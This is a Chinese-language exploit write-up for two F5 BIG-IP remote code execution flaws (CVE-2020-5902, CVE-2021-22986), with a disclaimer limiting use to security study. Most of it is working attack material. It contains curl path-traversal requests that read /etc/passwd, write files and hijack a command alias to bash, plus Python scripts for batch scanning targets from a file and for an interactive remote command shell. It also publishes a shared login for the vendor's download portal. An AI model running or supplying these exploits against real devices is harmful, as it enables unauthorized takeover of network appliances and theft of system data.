漏洞描述 声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。该漏洞影响控制面板受影响,不影响数据面板。
影响版本 1 2 3 4 5 BIG-IP 15.x: 15.1.0/15.0.0 BIG-IP 14.x: 14.1.0 ~ 14.1.2 BIG-IP 13.x: 13.1.0 ~ 13.1.3 BIG-IP 12.x: 12.1.0 ~ 12.1.5 BIG-IP 11.x: 11.6.1 ~ 11.6.5
FOFA语句 环境搭建 在官网下载vmware文件
1 https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.1.0&container=Virtual-Edition
直接访问会跳转,需要注册个账号。或者直接使用以下账户进行登陆。
1 F5登录账号:john12334@027168.com/John12334
登陆成功后,下载ova文件格式
导入Vmware:文件–>打开–>下一步导入虚拟机。导入后直接启动,使用系统默认账户:root/default登陆,随后修改默认密码。最后ifconfig。
浏览器访问:https://192.168.240.147/tmui/login.jsp
漏洞复现 F5 BIG-IP 远程代码执行漏洞 CVE-2020-5902 详情利用方式 https://github.com/jas502n/CVE-2020-5902
详情利用方式 https://github.com/wx3514/CVE-2020-5902/blob/master/CVE-2020-5902.md
漏洞验证:
1 2 # 浏览器中访问 https://192.168.240.147/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
执行tmsh命令;
1 2 curl -k "https://example.com/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin" curl -k "https://example.com/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
写入文件;
1 curl -k -H "Content-Type: application/x-www-form-urlencoded" -X POST -d "fileName=/tmp/success&content=CVE-2020-5902" "https://example.com/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp"
读取文件;
1 curl -k "https://example.com/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/success"
修改alias劫持list命令为bash;
1 2 3 4 5 6 7 curl -k "https://example.com/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash" # 写入bash文件 curl -k "https://example.com/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=id" # 执行bash文件 curl -k "https://example.com/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/test" # 还原list命令 curl -k "https://example.com/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list"
CVE-2020-5902漏洞POC 测试是否存在有此漏洞;
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 import requests import sys import json from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: 拾玖的猫 \033[0m') print('+ \033[34mGithub : 拾玖的猫 \033[0m') print('+ \033[34m公众号 : 小拾玖的猫 \033[0m') print('+ \033[34mVersion: F5 BIG-IP \033[0m') print('+ \033[36m使用格式: python3 CVE-2020-5902.py \033[0m') print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') print('+------------------------------------------') def POC_1(target_url): version_url = target_url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "Accept-Language":"zh-CN,zh;q=0.9", } try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.get(url=version_url, timeout=10, verify=False, headers=headers) if "output" in response.text: print("\033[32m[o] 目标 {} 存在漏洞,响应为:\n{}\033[0m".format(target_url, json.loads(response.text)["output"])) else: print("\033[31m[x] 目标漏洞无法利用 \033[0m") except Exception as e: print("\033[31m[x] 目标漏洞无法利用 ,{}\033[0m".format(e)) sys.exit(0) if __name__ == '__main__': title() target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) POC_1(target_url)
F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 漏洞验证,访问如下页面。
通过burp修改请求包;
1 2 3 4 5 6 7 8 9 10 11 POST /mgmt/tm/util/bash HTTP/1.1 Host: xxx.xxx.xxx.xxx:8443 Connection: close Content-Length: 41 Cache-Control: max-age=0 Authorization: Basic YWRtaW46QVNhc1M= X-F5-Auth-Token: Upgrade-Insecure-Requests: 1 Content-Type: application/json {"command":"run","utilCmdArgs":"-c id"}
成功执行命令id;
CVE-2021-22986漏洞POC 1.批量测试漏洞IP站点POC
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 import requests import sys import random import re import json from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: 小拾玖的猫 \033[0m') print('+ \033[34mGithub : 小拾玖的猫 \033[0m') print('+ \033[34m公众号 : 小拾玖的猫 \033[0m') print('+ \033[34mVersion: F5 BIG-IP \033[0m') print('+ \033[36m使用格式: python3 poc.py \033[0m') print('+ \033[36mFile >>> ip.txt \033[0m') print('+------------------------------------------') def POC_1(target_url): vuln_url = target_url + "/mgmt/tm/util/bash" headers = { "Authorization": "Basic YWRtaW46QVNhc1M=", "X-F5-Auth-Token": "", "Content-Type": "application/json" } data = '{"command":"run","utilCmdArgs":"-c id"}' try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=2) if "commandResult" in response.text and response.status_code == 200: print("\033[32m[o] 目标 {}存在漏洞,响应为:{} \033[0m".format(target_url, json.loads(response.text)["commandResult"])) else: print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url)) except Exception as e: print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url)) def Scan(file_name): with open(file_name, "r", encoding='utf8') as scan_url: for url in scan_url: if url[:4] != "http": url = "https://" + url url = url.strip('\n') try: POC_1(url) except Exception as e: print("\033[31m[x] 请求报错 \033[0m".format(e)) continue if __name__ == '__main__': title() file_name = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m")) Scan(file_name)
2.命令执行POC
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 import requests import sys import random import re import base64 import time import json from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: 小拾玖的猫 \033[0m') print('+ \033[34mGithub : 小拾玖的猫 \033[0m') print('+ \033[34m公众号 : 小拾玖的猫 \033[0m') print('+ \033[34mVersion: F5 BIG-IP \033[0m') print('+ \033[36m使用格式: python3 poc.py \033[0m') print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') print('+------------------------------------------') def POC_1(target_url): vuln_url = target_url + "/mgmt/tm/util/bash" headers = { "Authorization": "Basic YWRtaW46QVNhc1M=", "X-F5-Auth-Token": "", "Content-Type": "application/json" } data = '''{"command":"run","utilCmdArgs":"-c 'cat /etc/passwd'"}''' try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5) if 'root' in response.text and response.status_code == 200: print("\033[32m[o] 目标 {}存在漏洞,响应为:{} \033[0m".format(target_url, json.loads(response.text)["commandResult"])) while True: Cmd = str(input("\033[35mCmd >>> \033[0m")) POC_2(target_url, Cmd) else: print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url)) except Exception as e: print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url), e) def POC_2(target_url, Cmd): vuln_url = target_url + "/mgmt/tm/util/bash" headers = { "Authorization": "Basic YWRtaW46QVNhc1M=", "X-F5-Auth-Token": "", "Content-Type": "application/json" } Cmd = "'" + Cmd + "'" data = '{"command":"run","utilCmdArgs":"-c %s"}' % Cmd try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5) print("\033[32m{} \033[0m".format(json.loads(response.text)["commandResult"])) except Exception as e: print("\033[31m[x] 命令执行失败 \033[0m".format(target_url), e) if __name__ == '__main__': title() target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) POC_1(target_url)
